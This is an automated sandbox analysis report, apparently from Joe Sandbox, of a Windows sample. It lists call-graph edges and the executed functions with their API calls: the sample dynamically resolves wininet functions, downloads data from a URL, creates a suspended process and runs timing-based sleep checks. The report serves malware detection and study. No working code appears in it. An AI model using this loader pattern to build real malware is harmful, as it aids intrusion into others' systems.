18101->18117 18104 31a68a 18103->18104 18105 31a69f 18103->18105 18106 315b3e __dosmaperr 14 API calls 18104->18106 18105->18094 18107 31a68f 18106->18107 18141 3117df 18107->18141 18111 31a6c6 18110->18111 18112 31a6f0 18111->18112 18113 31a67e __fread_nolock 39 API calls 18111->18113 18112->18101 18114 31a6e1 18113->18114 18356 324971 18114->18356 18116 31a6e7 18116->18101 18118 3196e7 __Getctype 14 API calls 18117->18118 18119 31e02a 18118->18119 18120 319744 ___free_lconv_mon 14 API calls 18119->18120 18121 31e034 18120->18121 18121->18097 18123 31d3b3 18122->18123 18124 31d3af 18122->18124 18126 31d402 18123->18126 18365 32079e 18123->18365 18124->18096 18126->18096 18127 31d3d4 18127->18126 18128 31d3dc SetFilePointerEx 18127->18128 18128->18126 18129 31d3f3 GetFileSizeEx 18128->18129 18129->18126 18131 31a67e __fread_nolock 39 API calls 18130->18131 18132 31d2d6 18131->18132 18133 31d2e9 18132->18133 18134 31d37c 18132->18134 18136 31d306 18133->18136 18139 31d32d 18133->18139 18135 31c6d2 ___scrt_uninitialize_crt 64 API calls 18134->18135 18138 31d2a9 18135->18138 18381 31c6d2 18136->18381 18139->18138 18392 31df51 18139->18392 18144 31172b 18141->18144 18145 31173d _Fputc 18144->18145 18150 311762 18145->18150 18147 311755 18161 31151b 18147->18161 18151 311772 18150->18151 18152 311779 18150->18152 18167 311580 GetLastError 18151->18167 18157 311787 18152->18157 18171 311557 18152->18171 18155 3117ae 18155->18157 18174 31180c IsProcessorFeaturePresent 18155->18174 18157->18147 18158 3117de 18159 31172b __fread_nolock 39 API calls 18158->18159 18160 3117eb 18159->18160 18160->18147 18162 311527 18161->18162 18163 31153e 18162->18163 18214 3115c6 18162->18214 18165 3115c6 _Fputc 39 API calls 18163->18165 18166 311551 18163->18166 18165->18166 18166->18094 18168 311599 18167->18168 18178 3195b2 18168->18178 18172 311562 GetLastError SetLastError 18171->18172 18173 31157b 18171->18173 18172->18155 18173->18155 18175 311818 18174->18175 18200 3115e3 18175->18200 18179 3195c5 18178->18179 18180 3195cb 18178->18180 18181 31ae0f __Getctype 6 API calls 18179->18181 18182 31ae4e __Getctype 6 API calls 18180->18182 18199 3115b1 SetLastError 18180->18199 18181->18180 18183 3195e5 18182->18183 18184 3196e7 __Getctype 14 API calls 18183->18184 18183->18199 18185 3195f5 18184->18185 18186 319612 18185->18186 18187 3195fd 18185->18187 18188 31ae4e __Getctype 6 API calls 18186->18188 18189 31ae4e __Getctype 6 API calls 18187->18189 18190 31961e 18188->18190 18196 319609 18189->18196 18191 319631 18190->18191 18192 319622 18190->18192 18195 3191de __Getctype 14 API calls 18191->18195 18194 31ae4e __Getctype 6 API calls 18192->18194 18193 319744 ___free_lconv_mon 14 API calls 18193->18199 18194->18196 18197 31963c 18195->18197 18196->18193 18198 319744 ___free_lconv_mon 14 API calls 18197->18198 18198->18199 18199->18152 18201 3115ff __InternalCxxFrameHandler __fread_nolock 18200->18201 18202 31162b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18201->18202 18205 3116fc __InternalCxxFrameHandler 18202->18205 18204 31171a GetCurrentProcess TerminateProcess 18204->18158 18206 30d293 18205->18206 18207 30d29b 18206->18207 18208 30d29c IsProcessorFeaturePresent 18206->18208 18207->18204 18210 30db50 18208->18210 18213 30db13 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18210->18213 18212 30dc33 18212->18204 18213->18212 18215 3115d0 18214->18215 18216 3115d9 18214->18216 18217 311580 _Fputc 16 API calls 18215->18217 18216->18163 18218 3115d5 18217->18218 18218->18216 18221 315b51 18218->18221 18232 31eecc 18221->18232 18224 315b61 18226 315b6b IsProcessorFeaturePresent 18224->18226 18231 315b8a 18224->18231 18227 315b77 18226->18227 18229 3115e3 __InternalCxxFrameHandler 8 API calls 18227->18229 18229->18231 18262 311b3f 18231->18262 18265 31edfa 18232->18265 18235 31ef11 18236 31ef1d ___scrt_is_nonwritable_in_current_image 18235->18236 18237 31ef4e __InternalCxxFrameHandler 18236->18237 18238 319501 __dosmaperr 14 API calls 18236->18238 18239 31ef6d 18236->18239 18240 31ef7f __InternalCxxFrameHandler 18236->18240 18237->18239 18237->18240 18261 31ef57 18237->18261 18238->18237 18241 315b3e __dosmaperr 14 API calls 18239->18241 18243 31efb5 __InternalCxxFrameHandler 18240->18243 18276 313a77 EnterCriticalSection 18240->18276 18242 31ef72 18241->18242 18244 3117df __fread_nolock 39 API calls 18242->18244 18247 31eff2 18243->18247 18248 31f0ef 18243->18248 18258 31f020 18243->18258 18244->18261 18247->18258 18277 3193b0 GetLastError 18247->18277 18250 31f0fa 18248->18250 18308 313abf LeaveCriticalSection 18248->18308 18252 311b3f __InternalCxxFrameHandler 21 API calls 18250->18252 18253 31f102 18252->18253 18255 3193b0 __Getctype 39 API calls 18259 31f075 18255->18259 18257 3193b0 __Getctype 39 API calls 18257->18258 18304 31f09b 18258->18304 18260 3193b0 __Getctype 39 API calls 18259->18260 18259->18261 18260->18261 18261->18224 18310 3119af 18262->18310 18266 31ee06 ___scrt_is_nonwritable_in_current_image 18265->18266 18271 313a77 EnterCriticalSection 18266->18271 18268 31ee14 18272 31ee56 18268->18272 18271->18268 18275 313abf LeaveCriticalSection 18272->18275 18274 315b56 18274->18224 18274->18235 18275->18274 18276->18243 18278 3193cc 18277->18278 18279 3193c6 18277->18279 18281 31ae4e __Getctype 6 API calls 18278->18281 18283 3193d0 SetLastError 18278->18283 18280 31ae0f __Getctype 6 API calls 18279->18280 18280->18278 18282 3193e8 18281->18282 18282->18283 18285 3196e7 __Getctype 14 API calls 18282->18285 18287 319460 18283->18287 18288 319465 18283->18288 18286 3193fd 18285->18286 18289 319405 18286->18289 18290 319416 18286->18290 18287->18257 18291 315b51 CallUnexpected 37 API calls 18288->18291 18292 31ae4e __Getctype 6 API calls 18289->18292 18293 31ae4e __Getctype 6 API calls 18290->18293 18294 31946a 18291->18294 18296 319413 18292->18296 18295 319422 18293->18295 18297 319426 18295->18297 18298 31943d 18295->18298 18301 319744 ___free_lconv_mon 14 API calls 18296->18301 18300 31ae4e __Getctype 6 API calls 18297->18300 18299 3191de __Getctype 14 API calls 18298->18299 18302 319448 18299->18302 18300->18296 18301->18283 18303 319744 ___free_lconv_mon 14 API calls 18302->18303 18303->18283 18305 31f067 18304->18305 18306 31f09f 18304->18306 18305->18255 18305->18259 18305->18261 18309 313abf LeaveCriticalSection 18306->18309 18308->18250 18309->18305 18311 3119dc 18310->18311 18312 3119ee 18310->18312 18337 30d8c3 GetModuleHandleW 18311->18337 18322 311840 18312->18322 18317 311a2b 18323 31184c ___scrt_is_nonwritable_in_current_image 18322->18323 18345 313a77 EnterCriticalSection 18323->18345 18325 311856 18346 3118c7 18325->18346 18327 311863 18350 311881 18327->18350 18330 311a46 18353 311a77 18330->18353 18332 311a50 18333 311a64 18332->18333 18334 311a54 GetCurrentProcess TerminateProcess 18332->18334 18335 311a90 __InternalCxxFrameHandler 3 API calls 18333->18335 18334->18333 18336 311a6c ExitProcess 18335->18336 18338 30d8cf 18337->18338 18338->18312 18339 311a90 GetModuleHandleExW 18338->18339 18340 311af0 18339->18340 18341 311acf GetProcAddress 18339->18341 18343 311af6 FreeLibrary 18340->18343 18344 3119ed 18340->18344 18341->18340 18342 311ae3 18341->18342 18342->18340 18343->18344 18344->18312 18345->18325 18347 3118d3 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 18346->18347 18348 316dca __InternalCxxFrameHandler 14 API calls 18347->18348 18349 311937 __InternalCxxFrameHandler 18347->18349 18348->18349 18349->18327 18351 313abf std::_Lockit::~_Lockit LeaveCriticalSection 18350->18351 18352 31186f 18351->18352 18352->18317 18352->18330 18354 3196c0 __InternalCxxFrameHandler 5 API calls 18353->18354 18355 311a7c __InternalCxxFrameHandler 18354->18355 18355->18332 18357 32498b 18356->18357 18358 32497e 18356->18358 18361 324997 18357->18361 18362 315b3e __dosmaperr 14 API calls 18357->18362 18359 315b3e __dosmaperr 14 API calls 18358->18359 18360 324983 18359->18360 18360->18116 18361->18116 18363 3249b8 18362->18363 18364 3117df __fread_nolock 39 API calls 18363->18364 18364->18360 18366 3207c0 18365->18366 18367 3207ab 18365->18367 18369 315b2b __dosmaperr 14 API calls 18366->18369 18371 3207e5 18366->18371 18378 315b2b 18367->18378 18372 3207f0 18369->18372 18371->18127 18374 315b3e __dosmaperr 14 API calls 18372->18374 18373 315b3e __dosmaperr 14 API calls 18375 3207b8 18373->18375 18376 3207f8 18374->18376 18375->18127 18377 3117df __fread_nolock 39 API calls 18376->18377 18377->18375 18379 319501 __dosmaperr 14 API calls 18378->18379 18380 315b30 18379->18380 18380->18373 18382 31c6de ___scrt_is_nonwritable_in_current_image 18381->18382 18383 31c71f 18382->18383 18384 31c765 18382->18384 18391 31c6e6 18382->18391 18385 311762 _Fputc 39 API calls 18383->18385 18398 3206c7 EnterCriticalSection 18384->18398 18385->18391 18387 31c76b 18388 31c789 18387->18388 18399 31c7e3 18387->18399 18425 31c7db 18388->18425 18391->18138 18393 31df65 _Fputc 18392->18393 18546 31dda9 18393->18546 18396 31151b _Fputc 39 API calls 18397 31df89 18396->18397 18397->18138 18398->18387 18400 31c80b 18399->18400 18422 31c82e __fread_nolock 18399->18422 18401 31c80f 18400->18401 18403 31c86a 18400->18403 18402 311762 _Fputc 39 API calls 18401->18402 18402->18422 18404 31c888 18403->18404 18428 31dfef 18403->18428 18431 31c35f 18404->18431 18408 31c8a0 18412 31c8a8 18408->18412 18413 31c8cf 18408->18413 18409 31c8e7 18410 31c950 WriteFile 18409->18410 18411 31c8fb 18409->18411 18414 31c972 GetLastError 18410->18414 18410->18422 18416 31c903 18411->18416 18417 31c93c 18411->18417 18412->18422 18438 31c2f7 18412->18438 18443 31bf30 GetConsoleOutputCP 18413->18443 18414->18422 18420 31c928 18416->18420 18421 31c908 18416->18421 18471 31c3dc 18417->18471 18463 31c5a0 18420->18463 18421->18422 18456 31c4b7 18421->18456 18422->18388 18545 3206ea LeaveCriticalSection 18425->18545 18427 31c7e1 18427->18391 18478 31dece 18428->18478 18430 31e008 18430->18404 18432 324971 __fread_nolock 39 API calls 18431->18432 18434 31c371 18432->18434 18433 31c3d5 18433->18408 18433->18409 18434->18433 18435 31c39f 18434->18435 18484 313720 18434->18484 18435->18433 18437 31c3b9 GetConsoleMode 18435->18437 18437->18433 18440 31c319 18438->18440 18442 31c34e 18438->18442 18439 31c350 GetLastError 18439->18442 18440->18439 18441 324ae6 5 API calls ___scrt_uninitialize_crt 18440->18441 18440->18442 18441->18440 18442->18422 18444 31bfa2 18443->18444 18451 31bfa9 _Yarn 18443->18451 18445 313720 std::_Locinfo::_Locinfo_dtor 39 API calls 18444->18445 18445->18451 18446 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18447 31c2f0 18446->18447 18447->18422 18448 31a54b 40 API calls ___scrt_uninitialize_crt 18448->18451 18449 31c25f 18449->18446 18449->18449 18451->18448 18451->18449 18451->18451 18452 31c1d8 WriteFile 18451->18452 18453 324869 5 API calls std::_Locinfo::_Locinfo_dtor 18451->18453 18455 31c216 WriteFile 18451->18455 18542 31f3a3 18451->18542 18452->18451 18454 31c2ce GetLastError 18452->18454 18453->18451 18454->18449 18455->18451 18455->18454 18460 31c4c6 ___scrt_uninitialize_crt 18456->18460 18457 31c585 18459 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18457->18459 18458 31c53b WriteFile 18458->18460 18461 31c587 GetLastError 18458->18461 18462 31c59e 18459->18462 18460->18457 18460->18458 18461->18457 18462->18422 18467 31c5af ___scrt_uninitialize_crt 18463->18467 18464 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18465 31c6d0 18464->18465 18465->18422 18466 31f3a3 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 18466->18467 18467->18466 18468 31c6b9 GetLastError 18467->18468 18469 31c66e WriteFile 18467->18469 18470 31c6b7 18467->18470 18468->18470 18469->18467 18469->18468 18470->18464 18476 31c3eb ___scrt_uninitialize_crt 18471->18476 18472 31c49c 18473 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18472->18473 18474 31c4b5 18473->18474 18474->18422 18475 31c45b WriteFile 18475->18476 18477 31c49e GetLastError 18475->18477 18476->18472 18476->18475 18477->18472 18479 32079e __fread_nolock 39 API calls 18478->18479 18480 31dee0 18479->18480 18481 31defc SetFilePointerEx 18480->18481 18483 31dee8 __fread_nolock 18480->18483 18482 31df14 GetLastError 18481->18482 18481->18483 18482->18483 18483->18430 18485 3115c6 _Fputc 39 API calls 18484->18485 18486 313730 18485->18486 18491 3197f9 18486->18491 18492 319810 18491->18492 18493 31374d 18491->18493 18492->18493 18499 321766 18492->18499 18495 319857 18493->18495 18496 31986e 18495->18496 18498 31375a 18495->18498 18496->18498 18521 32005a 18496->18521 18498->18435 18500 321772 ___scrt_is_nonwritable_in_current_image 18499->18500 18501 3193b0 __Getctype 39 API calls 18500->18501 18502 32177b 18501->18502 18503 3217c1 18502->18503 18512 313a77 EnterCriticalSection 18502->18512 18503->18493 18505 321799 18513 3217e7 18505->18513 18510 315b51 CallUnexpected 39 API calls 18511 3217e6 18510->18511 18512->18505 18514 3217f5 __Getctype 18513->18514 18516 3217aa 18513->18516 18515 32151a __Getctype 14 API calls 18514->18515 18514->18516 18515->18516 18517 3217c6 18516->18517 18520 313abf LeaveCriticalSection 18517->18520 18519 3217bd 18519->18503 18519->18510 18520->18519 18522 3193b0 __Getctype 39 API calls 18521->18522 18523 32005f 18522->18523 18526 31ff72 18523->18526 18527 31ff7e ___scrt_is_nonwritable_in_current_image 18526->18527 18528 31ff98 18527->18528 18537 313a77 EnterCriticalSection 18527->18537 18530 31ff9f 18528->18530 18532 315b51 CallUnexpected 39 API calls 18528->18532 18530->18498 18533 320011 18532->18533 18534 31ffa8 18535 319744 ___free_lconv_mon 14 API calls 18534->18535 18536 31ffd4 18534->18536 18535->18536 18538 31fff1 18536->18538 18537->18534 18541 313abf LeaveCriticalSection 18538->18541 18540 31fff8 18540->18528 18541->18540 18544 31f3b6 std::_Locinfo::_Locinfo_dtor 18542->18544 18543 31f3f4 WideCharToMultiByte 18543->18451 18544->18543 18545->18427 18549 31ddb5 ___scrt_is_nonwritable_in_current_image 18546->18549 18547 31ddbd 18547->18396 18548 31ddf8 18550 311762 _Fputc 39 API calls 18548->18550 18549->18547 18549->18548 18551 31de3e 18549->18551 18550->18547 18557 3206c7 EnterCriticalSection 18551->18557 18553 31de44 18554 31de65 18553->18554 18555 31dece __fread_nolock 41 API calls 18553->18555 18558 31dec6 18554->18558 18555->18554 18557->18553 18561 3206ea LeaveCriticalSection 18558->18561 18560 31decc 18560->18547 18561->18560 21103 3174d3 21106 31719f 21103->21106 21107 3171ab ___scrt_is_nonwritable_in_current_image 21106->21107 21114 313a77 EnterCriticalSection 21107->21114 21109 3171e3 21115 317201 21109->21115 21110 3171b5 21110->21109 21112 3217e7 __Getctype 14 API calls 21110->21112 21112->21110 21114->21110 21118 313abf LeaveCriticalSection 21115->21118 21117 3171ef 21118->21117 23048 30bbde 23049 30bc01 23048->23049 23050 30bbfa 23048->23050 23049->23050 23053 30bc47 23049->23053 23055 30bca7 23049->23055 23051 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23050->23051 23052 30bce6 23051->23052 23053->23050 23057 30b601 23053->23057 23055->23050 23056 314db3 67 API calls 23055->23056 23056->23050 23060 314448 23057->23060 23061 31445b _Fputc 23060->23061 23066 3142e7 23061->23066 23063 31446a 23064 31151b _Fputc 39 API calls 23063->23064 23065 30b611 23064->23065 23065->23050 23067 3142f3 ___scrt_is_nonwritable_in_current_image 23066->23067 23068 314320 23067->23068 23069 3142fc 23067->23069 23080 313c57 EnterCriticalSection 23068->23080 23071 311762 _Fputc 39 API calls 23069->23071 23079 314315 _Fputc 23071->23079 23072 314329 23073 31433e 23072->23073 23074 31a67e __fread_nolock 39 API calls 23072->23074 23075 3143db _Fputc 23073->23075 23076 3143aa 23073->23076 23074->23073 23081 314413 23075->23081 23077 311762 _Fputc 39 API calls 23076->23077 23077->23079 23079->23063 23080->23072 23084 313c6b LeaveCriticalSection 23081->23084 23083 314419 23083->23079 23084->23083 23160 313bc5 23161 3140db ___scrt_uninitialize_crt 68 API calls 23160->23161 23162 313bcd 23161->23162 23170 31bb17 23162->23170 23164 313bd2 23165 31bbc2 14 API calls 23164->23165 23166 313be1 DeleteCriticalSection 23165->23166 23166->23164 23167 313bfc 23166->23167 23168 319744 ___free_lconv_mon 14 API calls 23167->23168 23169 313c07 23168->23169 23171 31bb23 ___scrt_is_nonwritable_in_current_image 23170->23171 23180 313a77 EnterCriticalSection 23171->23180 23173 31bb9a 23181 31bbb9 23173->23181 23174 31bb2e 23174->23173 23176 31bb6e DeleteCriticalSection 23174->23176 23178 313da4 69 API calls 23174->23178 23179 319744 ___free_lconv_mon 14 API calls 23176->23179 23178->23174 23179->23174 23180->23174 23184 313abf LeaveCriticalSection 23181->23184 23183 31bba6 23183->23164 23184->23183

                            Executed Functions

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 3059a0-3059da call 30dd20 call 3138b9 call 311bbd call 30c7b8 9 3059e1-3059fe 0->9 9->9 10 305a00-305a20 call 30a760 9->10 13 305a22-305a27 10->13 14 305a45-305ac0 call 308790 call 308a30 call 304d90 call 308790 call 308a30 call 308790 call 3068e0 call 308790 call 308a30 10->14 13->14 15 305a29 13->15 37 305ce6-305d0c call 308790 call 308a30 14->37 38 305ac6-305b51 call 30cd92 14->38 17 305a30-305a43 call 30a760 15->17 17->14 48 305d56-305dcf call 308790 call 3068e0 call 308790 call 308a30 call 3138b9 GetTickCount call 311bbd call 311b9c Sleep LoadLibraryA 37->48 49 305d0e 37->49 44 305b56-305b71 call 311b9c 38->44 50 305b90-305ba8 call 3015e0 44->50 51 305b73-305b8e 44->51 109 305df0-305e04 48->109 110 305dd1-305de3 GetProcAddress 48->110 53 305d10-305d25 call 308790 49->53 54 305bac-305bb1 50->54 51->54 65 305d27 53->65 66 305d29-305d44 call 309d40 call 308a30 53->66 59 305bb3-305bbb 54->59 60 305bbd-305c22 call 30cdc2 call 306d20 54->60 59->44 77 305c24-305c2b call 306d20 60->77 78 305c5f-305c6d call 309f90 60->78 65->66 80 305d4a-305d54 66->80 81 30622b call 30adcf 66->81 88 305c30-305c43 77->88 86 305c72 78->86 80->48 80->53 90 306230-30628a call 301830 GetTickCount call 311bbd call 311b9c Sleep call 304d00 call 3062e0 call 304c70 call 306380 MessageBoxW call 311b7b 81->90 91 305c79-305c7b 86->91 93 305c45-305c4f 88->93 94 305c56-305c5d 88->94 166 30628f call 309d00 90->166 96 305c9d-305ca4 91->96 97 305c7d-305c92 91->97 93->94 94->91 102 305cd3-305ce0 96->102 103 305ca6-305cb3 96->103 97->96 102->37 102->38 107 305cb5-305cc3 103->107 108 305cc9-305cd0 call 30cdc2 103->108 107->108 112 306226 call 3117ef 107->112 108->102 117 305e55-305e5c 109->117 118 305e06-305e53 109->118 115 305de9-305dea FreeLibrary 110->115 116 30601d-306023 KiUserCallbackDispatcher 110->116 112->81 115->109 125 306029-30603b FreeLibrary 116->125 121 305e62-305e9c 117->121 122 305f99-305fc0 117->122 118->117 124 305ea0-305f6f 121->124 127 305fc3-305fc8 122->127 124->124 128 305f75-305f82 124->128 129 306051-306057 125->129 130 30603d-306043 125->130 127->127 132 305fca-305feb call 301500 call 3042e0 127->132 128->122 134 305f84 128->134 136 306061-306067 129->136 137 306059-30605f 129->137 130->90 135 306049-30604f 130->135 154 305ff1-305ffe 132->154 155 3060b4-3060fa call 301240 132->155 140 305f87-305f93 134->140 141 30607f 135->141 143 306071-306077 136->143 144 306069-30606f 136->144 137->141 140->140 148 305f95 140->148 141->90 145 306085-306087 141->145 143->145 146 306079 143->146 144->141 145->90 152 30608d-306093 145->152 146->141 148->122 152->90 156 306099-30609f 152->156 158 306004-306012 154->158 159 3060aa-3060b1 call 30cdc2 154->159 168 306157-306162 call 302880 155->168 169 3060fc-306102 155->169 156->90 160 3060a5 156->160 158->112 163 306018 158->163 159->155 160->109 163->159 173 306294 call 301190 166->173 180 306192-30619c 168->180 181 306164-306170 168->181 169->166 172 306108-30610e 169->172 175 306110-306115 172->175 176 306137-306140 call 30cd92 172->176 186 306299-3062a8 call 3117ef 173->186 175->173 177 30611b-306126 call 30cd92 175->177 193 306142-306154 call 30e480 176->193 177->186 199 30612c-306135 177->199 183 3061cb-3061ed 180->183 184 30619e-3061ab 180->184 187 306172-306180 181->187 188 306188-30618f call 30cdc2 181->188 195 30621c-306223 183->195 196 3061ef-3061fc 183->196 191 3061c1-3061c8 call 30cdc2 184->191 192 3061ad-3061bb 184->192 207 3062aa-3062b8 186->207 208 3062bf-3062c0 186->208 187->186 197 306186 187->197 188->180 191->183 192->186 192->191 193->168 203 306212-306214 call 30cdc2 196->203 204 3061fe-30620c 196->204 197->188 199->193 210 306219 203->210 204->186 204->203 207->208 210->195
                            APIs
                              • Part of subcall function 003138B9: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?,003059B9,00000000,00000000), ref: 003138CE
                              • Part of subcall function 003138B9: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003138ED
                            • GetTickCount.KERNEL32 ref: 00305D91
                            • Sleep.KERNELBASE(?,?,?,?,?,?), ref: 00305DB6
                            • LoadLibraryA.KERNEL32(user32.dll,?,?,?,?,?,?), ref: 00305DC1
                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00305DD7
                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?), ref: 00305DEA
                            • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?), ref: 0030601F
                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?), ref: 0030602F
                            • GetTickCount.KERNEL32 ref: 00306237
                            • Sleep.KERNEL32(?,?,?,?,?,?,?), ref: 0030625C
                            • MessageBoxW.USER32(00000000,00000000,00000000,00000040), ref: 00306282
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00306294
                            Strings
                            • 4<3, xrefs: 0030591C
                            • user32.dll, xrefs: 00305DBC
                            • 0<3, xrefs: 00305A8A
                            • 4<3, xrefs: 00305681
                            • 0<3, xrefs: 00305D70
                            • _, xrefs: 00305AEF
                            • d, xrefs: 00305B0E
                            • 0<3, xrefs: 003055E2
                            • 4<3, xrefs: 0030560C
                            • =3, xrefs: 00305C5F, 00305C66
                            • , xrefs: 003058FC
                            • 4<3, xrefs: 0030565A
                            • GetSystemMetrics, xrefs: 00305DD1
                            • 4<3, xrefs: 003056A8
                            • 4<3, xrefs: 00305633
                            • = , xrefs: 003055F1, 00305618, 0030563F, 00305666, 0030568D
                            • func_zamtK_0..., xrefs: 00304DAE
                            • 4<3, xrefs: 00305934
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Library$CountFreeSleepTickTime$AddressCallbackConcurrency::cancel_current_taskDispatcherFileLoadMessageProcSystemUnothrow_t@std@@@User__ehfuncinfo$??2@
                            • String ID: $ = $0<3$0<3$0<3$4<3$4<3$4<3$4<3$4<3$4<3$4<3$GetSystemMetrics$_$d$func_zamtK_0...$user32.dll$=3
                            • API String ID: 1832009041-38214448
                            • Opcode ID: 44042d820e355f50ee69d30a5884aec90e49ae22498156d7bae104d0855e9378
                            • Instruction ID: 4a9d0565ecced699c071566ce6063fd8a955b8538a26b7a91f7d7bc7150833ed
                            • Opcode Fuzzy Hash: 44042d820e355f50ee69d30a5884aec90e49ae22498156d7bae104d0855e9378
                            • Instruction Fuzzy Hash: 9D326A319163418BD717DB34C46679FB7E5BFC5300F008B2DF485AB292EB34A9858B82

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 212 3042e0-30432d 213 304383-304391 212->213 214 30432f-30437d 212->214 215 304393-3043aa 213->215 216 3043ed-304406 LoadLibraryA 213->216 214->213 219 3043b0-3043eb 215->219 217 304b62-304b84 216->217 218 30440c-304414 216->218 222 304b87-304b9b 217->222 220 304475-30447c 218->220 221 304416-30446e 218->221 219->216 219->219 223 304482-30449d 220->223 224 3044fe-304521 GetProcAddress 220->224 221->220 225 3044a0-3044db 223->225 226 304523-304577 224->226 227 30457d-304584 224->227 225->225 228 3044dd-3044e0 225->228 226->227 229 304618-30463b GetProcAddress 227->229 230 30458a-304611 227->230 228->224 231 3044e2-3044ea 228->231 232 304697-30469e 229->232 233 30463d-304691 229->233 230->229 234 3044f0-3044fc 231->234 235 304741-304763 GetProcAddress 232->235 236 3046a4-30473a 232->236 233->232 234->224 234->234 237 3047b5-3047bc 235->237 238 304765-3047af 235->238 236->235 239 304860-30487e GetProcAddress 237->239 240 3047c2-30484e 237->240 238->237 242 304884-304888 239->242 243 304b59-304b5c FreeLibrary 239->243 241 304850-30485e 240->241 241->239 241->241 242->243 244 30488e-304892 242->244 243->217 244->243 245 304898-30489a 244->245 245->243 246 3048a0-3048a8 245->246 247 3048aa-3048f4 246->247 248 3048fb-304925 246->248 247->248 249 3049bb-3049d3 248->249 250 30492b-3049b3 248->250 251 304a25-304a2c 249->251 252 3049d5-304a1f 249->252 250->249 253 304ae0-304b00 InternetOpenA 251->253 254 304a32-304ac7 251->254 252->251 253->243 256 304b02-304b22 253->256 255 304ad0-304ade 254->255 255->253 255->255 257 304b25-304b2a 256->257 257->257 258 304b2c-304b36 257->258 259 304b38 258->259 260 304b3a-304b4f InternetOpenUrlA 258->260 259->260 261 304b51-304b54 260->261 262 304b9c-304bb2 InternetReadFile 260->262 261->243 263 304bb4-304bbc 262->263 264 304c2e-304c69 FreeLibrary 262->264 265 304c2b 263->265 266 304bbe-304bc8 263->266 264->222 265->264 267 304bf5-304c07 call 308c20 266->267 268 304bca-304bf3 call 30e480 266->268 273 304c0c-304c24 InternetReadFile 267->273 268->273 273->265 275 304c26-304c29 273->275 275->263
                            APIs
                            • LoadLibraryA.KERNELBASE(?,00000000,?), ref: 003043FB
                            • GetProcAddress.KERNEL32(?,?), ref: 0030450F
                            • GetProcAddress.KERNEL32(?,?), ref: 00304629
                            • GetProcAddress.KERNEL32(?,?), ref: 00304752
                            • GetProcAddress.KERNEL32(?,?), ref: 00304871
                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00304AF6
                            • InternetOpenUrlA.WININET(00000000,?,?,?,04000000,00000000), ref: 00304B47
                            • FreeLibrary.KERNEL32(?), ref: 00304B5C
                            • InternetReadFile.WININET(00000000,00000400,00000400,?), ref: 00304BAD
                            • InternetReadFile.WININET(00000000,?,00000400,?,?,00000000,?,?), ref: 00304C1F
                            • FreeLibrary.KERNEL32(?), ref: 00304C3E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: AddressInternetProc$Library$FileFreeOpenRead$Load
                            • String ID:
                            • API String ID: 3799963043-0
                            • Opcode ID: 216a3746f4d916e849578517d169cda9ad9e838de7ab398a810b5e963ef0b1ed
                            • Instruction ID: 28eef71e3f99f9fa6fefeb23bf6ba2e5939bd456e03caf95b9685a0508a04c93
                            • Opcode Fuzzy Hash: 216a3746f4d916e849578517d169cda9ad9e838de7ab398a810b5e963ef0b1ed
                            • Instruction Fuzzy Hash: 9542BC71C14B898AD722CB74C8813EAF7F8EF69344F04871EE999B2152EB7176C58B40
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00302933
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00302A8B
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00302B09
                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00303C6F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
